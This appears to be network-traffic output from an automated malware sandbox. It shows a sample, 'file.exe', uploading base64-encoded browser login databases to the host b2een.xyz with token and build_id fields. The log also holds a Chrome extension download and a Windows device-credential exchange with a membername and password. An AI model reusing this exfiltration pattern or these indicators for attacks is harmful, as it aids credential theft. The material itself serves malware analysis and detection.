Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:02 UTC	594	OUT	GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 10:34:03 UTC	573	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 138356 X-GUploader-UploadID: AFiumC5isHQgmb4u0tVksA5hf1k3MbnVznHKmZB6lTKqoNZctsPSRpHdFo-Oey6vXSF6fQvBhWylcQdPxw X-Goog-Hash: crc32c=ld9IFg== Server: UploadServer Date: Sun, 24 Nov 2024 16:45:00 GMT Expires: Mon, 24 Nov 2025 16:45:00 GMT Cache-Control: public, max-age=31536000 Age: 64143 Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-25 10:34:03 UTC	817	IN	Data Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-11-25 10:34:03 UTC	1390	IN	Data Raw: 5f b2 be 56 5f e7 71 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c Data Ascii: _V_q:__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"\|F\|Vw%t.y.?&a<nS+\|=ra'}(pW9sC&jJ-''B0u?.;4BN\
2024-11-25 10:34:03 UTC	1390	IN	Data Raw: 8e b5 a1 c8 fb ee 81 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FS
2024-11-25 10:34:03 UTC	1390	IN	Data Raw: eb 3e aa 67 36 b6 c2 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00 Data Ascii: >g6}oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~
2024-11-25 10:34:03 UTC	1390	IN	Data Raw: 48 3f c7 20 98 a3 4a ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5 Data Ascii: H? Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
2024-11-25 10:34:03 UTC	1390	IN	Data Raw: 50 3d 5b 7f a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 Data Ascii: P=[C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8Q
2024-11-25 10:34:03 UTC	1390	IN	Data Raw: ee 12 87 56 cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 Data Ascii: VhKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2\|}nK+,\]Q\|Em:aox/cl &ud]p;MJW4M@
2024-11-25 10:34:03 UTC	1390	IN	Data Raw: 8f 15 60 c1 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 Data Ascii: `cc86D<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(\|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
2024-11-25 10:34:03 UTC	1390	IN	Data Raw: 3f a2 77 74 f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 Data Ascii: ?wt9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/mes
2024-11-25 10:34:03 UTC	1390	IN	Data Raw: c1 c2 b3 df 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 Data Ascii: to@Fi'W\|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG\|P_CjB5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6g Ad/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.5	49881	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:02 UTC	318	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 68733 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:34:02 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 64 34 35 36 37 31 63 63 33 31 61 66 37 61 36 39 34 30 64 65 39 35 63 32 33 33 33 32 64 61 33 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 65 34 66 32 64 65 63 31 34 32 38 30 30 39 66 38 62 63 37 35 35 65 38 33 61 32 31 64 31 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="token"6d45671cc31af7a6940de95c23332da3------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="build_id"93e4f2dec1428009f8bc755e83a21d1b------CBAKFCBFHJDHJKECAKEHCont
2024-11-25 10:34:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:34:02 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
2024-11-25 10:34:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:34:02 UTC	3313	OUT	Data Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31 Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
2024-11-25 10:34:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:34:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 10:34:04 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.5	49880	20.190.147.1	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:03 UTC	446	OUT	POST /ppsecure/deviceaddcredential.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 7642 Host: login.live.com
2024-11-25 10:34:03 UTC	7642	OUT	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 72 64 6c 6a 68 6e 65 64 78 6e 61 61 70 67 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 2c 68 6e 63 67 76 45 61 4a 70 64 64 73 3f 53 4a 79 68 45 38 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 6e 71 75 73 6b 66 70 70 70 63 69 76 63 3c 2f 4f 6c 64 4d Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02rdljhnedxnaapg</Membername><Password>,hncgvEaJpdds?SJyhE8</Password></Authentication><OldMembername>02vnquskfpppcivc</OldM
2024-11-25 10:34:05 UTC	542	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/xml Expires: Mon, 25 Nov 2024 10:33:04 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C542_SN1 x-ms-request-id: 1d2a56fb-2f91-498e-99b4-646814d792c4 PPServer: PPV: 30 H: SN1PEPF0002F042 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 25 Nov 2024 10:34:05 GMT Connection: close Content-Length: 17166
2024-11-25 10:34:05 UTC	15842	IN	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 34 30 31 31 39 34 45 45 31 34 45 34 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 32 38 65 66 61 35 64 36 2d 37 65 39 65 2d 34 63 31 38 2d 62 31 35 37 2d 37 64 66 64 30 33 63 36 37 65 31 30 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>0018401194EE14E4</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License 